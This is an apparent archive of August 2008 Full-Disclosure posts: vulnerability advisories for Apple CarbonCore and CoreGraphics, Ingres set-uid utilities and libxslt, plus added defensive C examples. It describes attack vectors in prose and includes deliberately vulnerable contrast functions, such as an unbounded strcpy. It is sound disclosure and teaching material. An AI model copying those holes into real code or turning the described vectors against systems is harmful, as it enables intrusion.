2008/03/30  n.runs AG thanks Apple Inc. for the status update and apologises for not being more responsive during the CanSecWest time-frame.
2008/03/31  Apple Inc. sends a second status update and provides a link to where the credits will appear (http://support.apple.com/kb/HT1222)
2008/04/01  n.runs AG acknowledges the update and sends a second set of vulnerabilities and PoC based on the good and frequent communications that n.runs AG has had with Apple Inc. so far.
2008/04/01  Apple Inc. thanks n.runs AG for the new PoC, acknowledges them and includes a status report. Some of the issues are reported to be already known to them and/or discovered internally previously to n.runs AG reporting. Apple Inc. also informs that Sergio's name and company has been added to their system to track credit information for each of the security issues, and provides the Radar IDs assigned to each of them. Apple mentions further issues when trying to reproduce some of the vulnerabilities.
2008/04/01  n.runs AG thanks for the quick response and also clarifies that n.runs AG expects, as described in the RFP, to be credited for all the vulnerabilities reported to Apple Inc. - all of which affect the most up-to-date products available to the public - whether they are internally known to Apple Inc or not.
2008/04/03  Apple Inc.
replies: "Yes, that's our policy: all reporters of non publicly known security bugs get credit."
2008/05/23  n.runs AG reports another vulnerability and requests a status update for the previously reported vulnerabilities
2008/05/29  Apple Inc. sends a status report and asks how n.runs would like to be credited, if there is some specific format.
2008/05/29  n.runs AG sends the requested information to Apple Inc.
2008/05/31  Apple Inc. sends the status report for the last reported issue, along with its Radar ID.
2008/07/10  n.runs AG requests a status update for the issues reported to Apple Inc.
2008/07/11  Apple Inc. sends the status report. Apple informs n.runs AG that some of the vulnerabilities had already been fixed, for which an update had been released some time ago. Apple Inc. also mentions that one of the vulnerabilities was found through internal security testing; consequently no credit was given, but that would be fixed. Apple Inc. requests the format for the credits that n.runs AG would like to have.
2008/07/13  n.runs AG replies with the following statement: "As I [Sergio Alvarez] said and you agreed in my first e-mails, before sending any of my findings, whether you found them internally or somebody else reported the same bugs that I'm reporting, you (Apple) have to credit me for my findings for the simple reason that I'm reporting them to you instead of releasing them to the public while the bugs are not fixed. That said, I've checked all the credits given in "iPhone 2.0 and iPod touch 2.0" (http://support.apple.com/kb/HT2351) and the ones given in "QuickTime 7.5" (http://support.apple.com/kb/HT1991), and I haven't been credited in any of them. This is a clear violation of our RFP. If by Monday, July 14th 2008 the proper credits are not given to me, I'll release all the vulnerabilities and bugs that I've reported to you and also the ones I didn't report yet by Tuesday, July 15th 2008."
2008/07/15  Apple Inc.
asks n.runs AG not to make their findings public and also publishes the credits for one of the issues reported. Apple also provides a status report for the previous findings.
2008/07/15  n.runs AG provides further use-cases and attack vectors information to Apple Inc.
2008/07/23  Apple Inc. creates a new security ID for the use-cases and attack vectors reported as a design issue to fix.
2008/07/23  n.runs thanks Apple Inc. for the feedback and asks for a status report update
2008/08/01  Apple Inc. notifies n.runs AG of the imminent release of an update and sends the related advisory and credits. (The update and credits were already available at the time n.runs AG read the email sent by Apple Inc.)
2008/08/01  n.runs AG releases this advisory
________________________________________________________________________

Overview:

Carbon is a set of C APIs offering developers an advanced user interface toolkit, event handling, access to the Quartz 2D graphics library, and multiprocessing support. Developers have access to other C and C++ APIs, including the OpenGL drawing system and the Mach microkernel.

CarbonCore gathers together a number of lower-level Mac OS Toolbox managers. Some of these are deprecated but essential to porting to Carbon. CarbonCore includes the old Device Manager, Date and Time Utilities, the Finder interface, Mixed Mode, CFM, the Thread Manager, the Collection Manager, the Script Manager, and more. Most of the Toolbox defines are in here.

Description:

A remotely exploitable vulnerability has been found in the file name parsing code. More specifically, passing a long file name to the CarbonCore framework file management API will trigger a stack buffer overflow.

Impact:

This problem can lead to remote arbitrary code execution if an attacker carefully crafts a file that exploits the aforementioned vulnerability. n.runs AG illustrated the exploitation using Safari and Mail - both present on a standard OS X installation - to demonstrate the risks.
The attack surface is however not limited to these two applications: any software component that makes use of the CarbonCore framework may allow arbitrary code execution.

The vulnerability is present in Apple CarbonCore Framework prior to the update released on Aug 1st, 2008.

Solution:

The vulnerability was reported on Apr 1st, 2008 and Apple Security Update has been issued to solve this vulnerability on Aug 1st, 2008. For detailed information about the fixes, follow the link in the references section [1] of this document.
________________________________________________________________________

Credits:

Bug found by Sergio "shadown" Alvarez of n.runs AG.
________________________________________________________________________

References:

[1] http://support.apple.com/kb/HT2647

This Advisory and Upcoming Advisories:
http://www.nruns.com/security_advisory.php

Subscribe to the n.runs newsletter by signing up to:
http://www.nruns.com/newsletter_en.php
________________________________________________________________________

Unaltered electronic reproduction of this advisory is permitted. For all other reproduction or publication, in printing or otherwise, contact security at nruns.com for permission. Use of the advisory constitutes acceptance for use in an "as is" condition. All warranties are excluded. In no event shall n.runs be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if n.runs has been advised of the possibility of such damages.

Copyright 2008 n.runs AG. All rights reserved. Terms of use apply.
From labs-no-reply at idefense.com Fri Aug 1 19:06:47 2008
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Fri, 01 Aug 2008 14:06:47 -0400
Subject: [Full-disclosure] iDefense Security Advisory 07.31.08: Apple Mac OS X CoreGraphics PDF Type1 Font Integer Overflow Vulnerability
Message-ID: <489350B7.7080704@idefense.com>

iDefense Security Advisory 07.31.08
http://labs.idefense.com/intelligence/vulnerabilities/
Jul 31, 2008

I. BACKGROUND

Mac OS X is a Unix operating system built from the XNU kernel. Mac OS X provides all the standard Unix capabilities and tools with an additional GUI component. For more information, see the vendor's site found at the following link URL.

http://www.apple.com/macosx/

II. DESCRIPTION

Remote exploitation of an integer overflow vulnerability in Apple Inc.'s Mac OS X could allow an attacker to execute arbitrary code with the privileges of the currently logged in user.

This vulnerability exists due to the way PDF files containing Type 1 fonts are handled. When processing a font with an overly large length, integer overflow could occur. This issue leads to heap corruption which can allow for arbitrary code execution.

III. ANALYSIS

Exploitation of this issue allows an attacker to execute arbitrary code. An attacker could exploit this issue via multiple attack vectors. The most appealing vector for attack is Safari. An attacker could host a malformed PDF file on a website and entice a targeted user to open a URL. Upon opening the URL in Safari the PDF file will be automatically parsed and exploitation will occur. While this is the most appealing attack vector, the file can also be attached to an e-mail. Any application which uses the Apple libraries for file open dialogs will crash upon previewing the malformed PDF document.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Mac OS X version 10.5.2. Previous versions may also be affected.

V.
WORKAROUND

iDefense is currently unaware of any workarounds for this issue.

VI. VENDOR RESPONSE

Apple addressed this vulnerability within their Mac OS X 2008-005 security update. More information is available at the following URL.

http://support.apple.com/kb/HT2647

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-2322 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

07/09/2008  Initial vendor notification
07/10/2008  Initial vendor response
07/31/2008  Public disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Pariente Kobi.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
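The advisory above names the bug class (a font length chosen by the attacker whose arithmetic wraps before a heap allocation is sized) but shows no code. The C below is an added example written for this digest; it is not iDefense's or Apple's code and not the CoreGraphics parser. It puts the wrapping size computation beside a loader that validates the declared length against the input actually present and checks the arithmetic in size_t before allocating. The record layout, RECORD_HEADER, load_font_checked and the sample inputs are all constructed for the example.

```c
/* Added example (not iDefense's or Apple's code): the integer-overflow
 * class from the CoreGraphics Type 1 advisory, shown on a constructed
 * "font record" format, beside a length-checked loader. */
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define RECORD_HEADER 16u   /* constructed: bytes prepended to the font data */

/* Constructed input format: 4-byte little-endian length, then font bytes. */
static uint32_t read_u32le(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Vulnerable pattern: the declared length is trusted and the allocation size
 * is computed in 32-bit arithmetic.  A length near UINT32_MAX wraps to a tiny
 * allocation while the later copy still uses the huge length, which is the
 * heap corruption the advisory describes.  Shown only so the check below has
 * something to prevent; nothing here copies with the wrapped size. */
static uint32_t unchecked_alloc_size(uint32_t declared_len)
{
    return declared_len + RECORD_HEADER;   /* wraps for declared_len > UINT32_MAX - 16 */
}

/* Hardened loader: the payload must fit in the input buffer, and the size
 * arithmetic must not wrap.  Returns NULL on any inconsistency; on success
 * *out_len receives the payload length and the caller owns the record. */
static unsigned char *load_font_checked(const unsigned char *buf, size_t buf_len,
                                        size_t *out_len)
{
    if (buf == NULL || out_len == NULL || buf_len < 4)
        return NULL;

    uint32_t declared = read_u32le(buf);

    /* 1. The declared payload must actually be present in the input. */
    if ((size_t)declared > buf_len - 4)
        return NULL;

    /* 2. The allocation size must not overflow size_t. */
    if ((size_t)declared > SIZE_MAX - RECORD_HEADER)
        return NULL;
    size_t alloc = (size_t)declared + RECORD_HEADER;

    unsigned char *rec = calloc(1, alloc);
    if (rec == NULL)
        return NULL;
    memcpy(rec + RECORD_HEADER, buf + 4, declared);
    *out_len = declared;
    return rec;
}

/* Self-check on two constructed inputs: an honest 5-byte font and one whose
 * length field (0xFFFFFFF0) would wrap the unchecked arithmetic.  Returns 1
 * when the checked loader accepts the first and rejects the second. */
static int self_check(void)
{
    const unsigned char good[] = {5, 0, 0, 0, 'a', 'b', 'c', 'd', 'e'};
    const unsigned char bad[]  = {0xF0, 0xFF, 0xFF, 0xFF, 'a', 'b', 'c', 'd', 'e'};
    size_t n = 0;
    unsigned char *rec = load_font_checked(good, sizeof good, &n);
    int ok = rec != NULL && n == 5 && memcmp(rec + RECORD_HEADER, "abcde", 5) == 0;
    free(rec);
    ok = ok && load_font_checked(bad, sizeof bad, &n) == NULL;
    return ok;
}

int main(void)
{
    return self_check() ? 0 : 1;
}
```

The two checks are deliberately separate: the first (declared length versus bytes present) catches truncated or lying inputs, the second (headroom before adding the header) is what closes the wrap itself, and on a 32-bit build only the second protects the allocation.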
From xploitable at gmail.com Fri Aug 1 19:14:37 2008
From: xploitable at gmail.com (n3td3v)
Date: Fri, 1 Aug 2008 19:14:37 +0100
Subject: [Full-disclosure] Fwd: Black Hat talk on Apple encryption cancelled
In-Reply-To: <1463f4c30808011113y2fe962e4x13e03cefc135da54@mail.gmail.com>
References: <1463f4c30808011113y2fe962e4x13e03cefc135da54@mail.gmail.com>
Message-ID: <4b6ee9310808011114i1cb6e9efs9a1427bce4b8ca6@mail.gmail.com>

---------- Forwarded message ----------
From: newsgroup
Date: Fri, Aug 1, 2008 at 7:13 PM
Subject: Black Hat talk on Apple encryption cancelled
To: n3td3v at googlegroups.com

Just days before the annual Black Hat security conference in Las Vegas, a talk on Apple's FileVault encryption system was abruptly canceled by its presenter.

Researcher Charles Edge told the Washington Post that he had signed confidentiality agreements with Apple. The agreements prevent him from discussing further any vulnerabilities he may have found within Apple's FileVault encryption system. Edge, Director of Technology of 318, Inc, has spoken at previous Black Hat and DefCon conferences.

This is not the first time a vendor has asked a security researcher not to give a talk at Black Hat. In 2005, then-ISS-employed researcher Michael Lynn was asked by Cisco not to present a talk on flaws within that company's routers. On stage at Black Hat, Lynn first quit his job, then went ahead and gave his original talk. Afterward, he, too, signed a confidentiality agreement with Cisco.
http://news.cnet.com/8301-1009_3-10004627-83.html

From security at mandriva.com Fri Aug 1 21:48:00 2008
From: security at mandriva.com (security at mandriva.com)
Date: Fri, 01 Aug 2008 14:48:00 -0600
Subject: [Full-disclosure] [ MDVSA-2008:160 ] libxslt
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDVSA-2008:160
http://www.mandriva.com/security/
_______________________________________________________________________

Package : libxslt
Date    : August 1, 2008
Affected: 2007.1, 2008.0, 2008.1, Corporate 4.0
_______________________________________________________________________

Problem Description:

Chris Evans of the Google Security Team found a vulnerability in the RC4 processing code in libxslt that did not properly handle corrupted key information. A remote attacker able to make an application linked against libxslt process malicious XML input could cause the application to crash or possibly execute arbitrary code with the privileges of the application in question (CVE-2008-2935).

The updated packages have been patched to correct this issue.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2935
_______________________________________________________________________

Updated Packages:

Mandriva Linux 2007.1:
9582b6a5a85d8a4fde0be6113565cd9d  2007.1/i586/libxslt1-1.1.20-2.2mdv2007.1.i586.rpm
5205ec749db53b73cbec782d507686df  2007.1/i586/libxslt1-devel-1.1.20-2.2mdv2007.1.i586.rpm
64a810f8ac91b49c80c38e33f2750f85  2007.1/i586/libxslt-proc-1.1.20-2.2mdv2007.1.i586.rpm
bb9f876808ec910122977f7166112245  2007.1/i586/python-libxslt-1.1.20-2.2mdv2007.1.i586.rpm
fa2168576c9baedb55b2577f913fbdec  2007.1/SRPMS/libxslt-1.1.20-2.2mdv2007.1.src.rpm

Mandriva Linux 2007.1/X86_64:
1bd1a4df038c3c4a5b753537854afd17  2007.1/x86_64/lib64xslt1-1.1.20-2.2mdv2007.1.x86_64.rpm
aaecaefb1c25c1838199058ffbec4bf9  2007.1/x86_64/lib64xslt1-devel-1.1.20-2.2mdv2007.1.x86_64.rpm
e39afe30c9f38113fde7e1fd060de05b  2007.1/x86_64/libxslt-proc-1.1.20-2.2mdv2007.1.x86_64.rpm
dfa8806c560c888f225b557622f3e10c  2007.1/x86_64/python-libxslt-1.1.20-2.2mdv2007.1.x86_64.rpm
fa2168576c9baedb55b2577f913fbdec  2007.1/SRPMS/libxslt-1.1.20-2.2mdv2007.1.src.rpm

Mandriva Linux 2008.0:
01d8d7608c3c74e8aa862f79907e07cc  2008.0/i586/libxslt1-1.1.22-2.2mdv2008.0.i586.rpm
4da832fd851d55b48b80341d7c3bc4ee  2008.0/i586/libxslt-devel-1.1.22-2.2mdv2008.0.i586.rpm
58e5f582472d1e28dce386c2bd5d9de4  2008.0/i586/libxslt-proc-1.1.22-2.2mdv2008.0.i586.rpm
74141e240b0e2a3b19790cb9addc0151  2008.0/i586/python-libxslt-1.1.22-2.2mdv2008.0.i586.rpm
85c0d64608fb55944316a2ac46096d13  2008.0/SRPMS/libxslt-1.1.22-2.2mdv2008.0.src.rpm

Mandriva Linux 2008.0/X86_64:
7ff6d48c755e2907846f9a6b6378b5b9  2008.0/x86_64/lib64xslt1-1.1.22-2.2mdv2008.0.x86_64.rpm
f026cc563722e6847d58b0e1e6f0f6ce  2008.0/x86_64/lib64xslt-devel-1.1.22-2.2mdv2008.0.x86_64.rpm
bc530cb61a211a50155c59c52de543c3  2008.0/x86_64/libxslt-proc-1.1.22-2.2mdv2008.0.x86_64.rpm
458c1d9d588b4a3a435eb26dcf23e2f5
2008.0/x86_64/python-libxslt-1.1.22-2.2mdv2008.0.x86_64.rpm
85c0d64608fb55944316a2ac46096d13  2008.0/SRPMS/libxslt-1.1.22-2.2mdv2008.0.src.rpm

Mandriva Linux 2008.1:
c8cab87e462864b9d575613630500965  2008.1/i586/libxslt1-1.1.22-2.2mdv2008.1.i586.rpm
2fb2120f868e093a73c766537eca4c4c  2008.1/i586/libxslt-devel-1.1.22-2.2mdv2008.1.i586.rpm
c9322ae81ff3e2bcbadef36a1d3f29ec  2008.1/i586/libxslt-proc-1.1.22-2.2mdv2008.1.i586.rpm
fa11c933fa71ffe7dffd869454809523  2008.1/i586/python-libxslt-1.1.22-2.2mdv2008.1.i586.rpm
126fa9767b486afdddd09ead4b9f5841  2008.1/SRPMS/libxslt-1.1.22-2.2mdv2008.1.src.rpm

Mandriva Linux 2008.1/X86_64:
d7eeca6bfa273ff8d3995144272825e8  2008.1/x86_64/lib64xslt1-1.1.22-2.2mdv2008.1.x86_64.rpm
cf74a4e8440e324e776d00162784da57  2008.1/x86_64/lib64xslt-devel-1.1.22-2.2mdv2008.1.x86_64.rpm
b6ff1bbf9fc5c56421b4cd2c60515c21  2008.1/x86_64/libxslt-proc-1.1.22-2.2mdv2008.1.x86_64.rpm
9507d84c1b2338ac8a06a76efd9cd94d  2008.1/x86_64/python-libxslt-1.1.22-2.2mdv2008.1.x86_64.rpm
126fa9767b486afdddd09ead4b9f5841  2008.1/SRPMS/libxslt-1.1.22-2.2mdv2008.1.src.rpm

Corporate 4.0:
6fddddda1818a68ea24d52e6e181f095  corporate/4.0/i586/libxslt1-1.1.15-1.2.20060mlcs4.i586.rpm
1679fdbdfb7020be4622fae157a2a2b5  corporate/4.0/i586/libxslt1-devel-1.1.15-1.2.20060mlcs4.i586.rpm
3a030cdd0fbadaf26b4871d371fe6f54  corporate/4.0/i586/libxslt-proc-1.1.15-1.2.20060mlcs4.i586.rpm
ecaa9e0beff76328b236a87870274b1d  corporate/4.0/i586/libxslt-python-1.1.15-1.2.20060mlcs4.i586.rpm
bf4154eaf3cff4b487a71c9f9edcb60c  corporate/4.0/SRPMS/libxslt-1.1.15-1.2.20060mlcs4.src.rpm

Corporate 4.0/X86_64:
953ce3b7b6f9f5be7c2a24d2aef92bbe  corporate/4.0/x86_64/lib64xslt1-1.1.15-1.2.20060mlcs4.x86_64.rpm
4ae0c85ebc4d13552b6db13a2067dea4  corporate/4.0/x86_64/lib64xslt1-devel-1.1.15-1.2.20060mlcs4.x86_64.rpm
65d3b3a21d5165b0eb256db4c57d946d  corporate/4.0/x86_64/libxslt-proc-1.1.15-1.2.20060mlcs4.x86_64.rpm
645272c4f3c51b3e28a19ff14be17a36  corporate/4.0/x86_64/libxslt-python-1.1.15-1.2.20060mlcs4.x86_64.rpm
bf4154eaf3cff4b487a71c9f9edcb60c  corporate/4.0/SRPMS/libxslt-1.1.15-1.2.20060mlcs4.src.rpm
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID    Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFIk0h+mqjQ0CJFipgRAh4bAJ0ZFnPrAmi0ZCs+VmIS3FNbrVq6BQCgmZDa
daQ2pWT0o/xjJuwNSVBtcSI=
=YYmK
-----END PGP SIGNATURE-----

From labs-no-reply at idefense.com Sat Aug 2 05:28:45 2008
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Sat, 02 Aug 2008 00:28:45 -0400
Subject: [Full-disclosure] iDefense Security Advisory 08.01.08: Ingres Database for Linux verifydb Insecure File Permissions Modification Vulnerability
Message-ID: <4893E27D.4040707@idefense.com>

iDefense Security Advisory 08.01.08
http://labs.idefense.com/intelligence/vulnerabilities/
Aug 01, 2008

I. BACKGROUND

Ingres Database is a database server used in several Computer Associates' products. For example, CA Directory Service uses the Ingres Database server. More information can be found on the vendor's website at the following URL.

http://ingres.com/downloads/prod-cert-download.php

II.
DESCRIPTION

Local exploitation of a file permissions modification vulnerability in the "verifydb" utility, as included with Ingres Database 2006 Release 2 for Linux, allows attackers to modify the permissions of files owned by the Ingres database user.

The vulnerability exists within the "verifydb" utility included with Ingres. It is used to cleanup unneeded files created in the database directory. This program has the set-uid bit set, and is owned by the "ingres" user.

The "verifydb" program improperly changes the permissions on files. The program first creates a file called "iivdb.log" in the current directory, and then makes it world writable. By creating a symbolic link to a file owned by the "ingres" user, an attacker can gain write access to the target file.

III. ANALYSIS

Exploitation of this vulnerability allows an attacker to overwrite arbitrary files owned by the "ingres" user. By itself, this vulnerability does not have very serious consequences. However, when combined with the library loading vulnerability, it allows an attacker to execute arbitrary code with root privileges.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Ingres 2006 Enterprise Edition Release 2 for Linux x86 (32-bit). Other versions may also be affected.

V. WORKAROUND

iDefense is currently unaware of any workaround for this issue.

VI. VENDOR RESPONSE

"This problem has been identified and resolved by Ingres in the following releases: Ingres 2006 release 2 (9.1.0), Ingres 2006 release 1 (9.0.4), and Ingres 2.6."

For more information, refer to Ingres' advisory at the following URL.

http://www.ingres.com/support/security-alert-080108.php

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-3356 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

VIII.
DISCLOSURE TIMELINE

07/20/2007  Initial vendor response
07/23/2007  Initial vendor notification
08/01/2008  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

From labs-no-reply at idefense.com Sat Aug 2 05:29:53 2008
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Sat, 02 Aug 2008 00:29:53 -0400
Subject: [Full-disclosure] iDefense Security Advisory 08.01.08: Ingres Database for Linux libbecompat Stack Based Buffer Overflow Vulnerability
Message-ID: <4893E2C1.7090705@idefense.com>

iDefense Security Advisory 08.01.08
http://labs.idefense.com/intelligence/vulnerabilities/
Aug 01, 2008

I. BACKGROUND

Ingres Database is a database server used in several Computer Associates' products. For example, CA Directory Service uses the Ingres Database server. More information can be found on the vendor's website at the following URL.

http://ingres.com/downloads/prod-cert-download.php

II.
DESCRIPTION

Local exploitation of a stack-based buffer overflow vulnerability in the "libbecompat" library, as included in Ingres Database 2006 Release 2 for Linux, allows attackers to execute arbitrary code with the privileges of the Ingres user.

The vulnerability exists within the "libbecompat" library that is used by several of the set-uid "ingres" utilities included with Ingres. When copying a user supplied environment variable into a fixed-size stack buffer, the library fails to check the length of the source string. This results in an exploitable stack buffer overflow.

III. ANALYSIS

Exploitation of this vulnerability allows an attacker to execute arbitrary code with the privileges of the "ingres" user. By itself, this vulnerability does not have very serious consequences. However, when combined with the library loading vulnerability, it allows an attacker to execute arbitrary code with root privileges.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Ingres 2006 Enterprise Edition Release 2 for Linux x86 (32-bit). Other versions may also be affected.

V. WORKAROUND

iDefense is currently unaware of any workaround for this issue.

VI. VENDOR RESPONSE

"This problem has been identified and resolved by Ingres in the following releases: Ingres 2006 release 2 (9.1.0), Ingres 2006 release 1 (9.0.4), and Ingres 2.6."

For more information, refer to Ingres' advisory at the following URL.

http://www.ingres.com/support/security-alert-080108.php

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-3389 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

07/20/2007  Initial vendor response
07/23/2007  Initial vendor notification
08/01/2008  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.
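The libbecompat report above and the verifydb report before it each describe a defect in a set-uid helper without showing code, and the n.runs CarbonCore advisory earlier in this digest (a long file name overrunning a fixed stack buffer) is the same unbounded-copy class as libbecompat. The C below is an added example written for this digest; it is not Ingres', Apple's or iDefense's code. copy_bounded and env_to_buffer show the length check an unbounded strcpy of an environment variable lacks, and open_log_nofollow shows a log file created with O_CREAT|O_EXCL|O_NOFOLLOW whose mode is set through the descriptor rather than by chmod on a path that a local user may have replaced with a symlink. All function names, the NAME_MAX_LEN buffer size and the temporary-directory self-check are assumptions made for the example.

```c
/* Added example (not Ingres', Apple's or iDefense's code): the two defensive
 * patterns a set-uid helper needs against the libbecompat/CarbonCore and
 * verifydb bug classes.  Linux/POSIX; names are invented for the example. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

#define NAME_MAX_LEN 63   /* constructed fixed buffer size for the example */

/* The bug class: an unbounded copy of caller-controlled text into a fixed
 * stack buffer.  strcpy() stops only at the NUL, so a long value runs past
 * dst.  Shown for contrast; main() never calls it. */
static void copy_unbounded(char dst[NAME_MAX_LEN + 1], const char *src)
{
    strcpy(dst, src);  /* no length check */
}

/* Hardened form: measure first, refuse what will not fit, copy with an
 * explicit bound, always NUL-terminate.  0 on success, -1/ENAMETOOLONG. */
static int copy_bounded(char dst[NAME_MAX_LEN + 1], const char *src)
{
    size_t n = strnlen(src, NAME_MAX_LEN + 1);
    if (n > NAME_MAX_LEN) { errno = ENAMETOOLONG; return -1; }
    memcpy(dst, src, n);
    dst[n] = '\0';
    return 0;
}

/* The call site libbecompat got wrong: an environment variable (attacker
 * controlled for a set-uid program) into a fixed buffer.  Missing = empty. */
static int env_to_buffer(const char *name, char dst[NAME_MAX_LEN + 1])
{
    const char *v = getenv(name);
    return copy_bounded(dst, v ? v : "");
}

/* The verifydb bug class is create-by-path then chmod(path, 0666): if path is
 * a symlink planted in the current directory, the mode change lands on the
 * link target.  Hardened: O_EXCL refuses any existing entry (symlinks too),
 * O_NOFOLLOW refuses to traverse one, the mode is applied to the descriptor,
 * and the file is never made world-writable.  Returns the fd or -1. */
static int open_log_nofollow(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;
    if (fchmod(fd, 0600) != 0) { close(fd); unlink(path); return -1; }
    return fd;
}

/* Self-check: a value that fits is copied intact, one of NAME_MAX_LEN + 9
 * bytes is refused.  Returns 1 when both hold. */
static int copy_self_check(void)
{
    char buf[NAME_MAX_LEN + 1];
    char longval[NAME_MAX_LEN + 10];
    memset(longval, 'A', sizeof longval - 1);
    longval[sizeof longval - 1] = '\0';
    if (copy_bounded(buf, "iivdb.log") != 0 || strcmp(buf, "iivdb.log") != 0) return 0;
    if (copy_bounded(buf, longval) != -1 || errno != ENAMETOOLONG) return 0;
    return 1;
}

/* Self-check in a private mkdtemp() directory: a dangling symlink named like
 * the log is refused, and a fresh file comes back mode 0600.  Returns 1 if so. */
static int log_open_self_check(void)
{
    char dir[] = "/tmp/iivdb-demo-XXXXXX";
    if (mkdtemp(dir) == NULL) return 0;
    char target[256], link_path[256], fresh_path[256];
    snprintf(target, sizeof target, "%s/victim", dir);       /* never created */
    snprintf(link_path, sizeof link_path, "%s/iivdb.log", dir);
    snprintf(fresh_path, sizeof fresh_path, "%s/fresh.log", dir);
    int ok = symlink(target, link_path) == 0;
    if (ok && open_log_nofollow(link_path) != -1) ok = 0;   /* must refuse */
    int fd = ok ? open_log_nofollow(fresh_path) : -1;
    struct stat st;
    if (fd < 0 || fstat(fd, &st) != 0 || (st.st_mode & 0777) != 0600) ok = 0;
    if (fd >= 0) close(fd);
    unlink(fresh_path); unlink(link_path); rmdir(dir);
    return ok;
}

int main(void)
{
    char buf[NAME_MAX_LEN + 1];
    (void)copy_unbounded;                      /* shown above, intentionally unused */
    printf("HOME fits in %d bytes: %s\n", NAME_MAX_LEN, env_to_buffer("HOME", buf) == 0 ? "yes" : "no");
    return (copy_self_check() && log_open_self_check()) ? 0 : 1;
}
```

The order of operations is the point for the verifydb case: every decision is made on the descriptor returned by a single open() with O_EXCL|O_NOFOLLOW, so there is no window between a path check and a path-based chmod for a link to be swapped in.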
Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

From labs-no-reply at idefense.com Sat Aug 2 05:30:27 2008
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Sat, 02 Aug 2008 00:30:27 -0400
Subject: [Full-disclosure] iDefense Security Advisory 08.01.08: Ingres Database for Linux ingvalidpw Untrusted Library Path Vulnerability
Message-ID: <4893E2E3.8060401@idefense.com>

iDefense Security Advisory 08.01.08
http://labs.idefense.com/intelligence/vulnerabilities/
Aug 01, 2008

I. BACKGROUND

Ingres Database is a database server used in several Computer Associates' products. For example, CA Directory Service uses the Ingres Database server. More information can be found on the vendor's website at the following URL.

http://ingres.com/downloads/prod-cert-download.php

II. DESCRIPTION

Local exploitation of an untrusted library path vulnerability in the "ingvalidpw" utility, as included in Ingres Database 2006 Release 2 for Linux, allows attackers to execute arbitrary code with root privileges.
The vulnerability exists within the "ingvalidpw" utility included with Ingres database. This utility is used to verify a user's credentials, and is installed set-uid root. When loading shared libraries, the "ingvalidpw" program will load libraries from a directory owned by the "ingres" user. By using a specially crafted library, a user with "ingres" privileges can gain root.

III. ANALYSIS

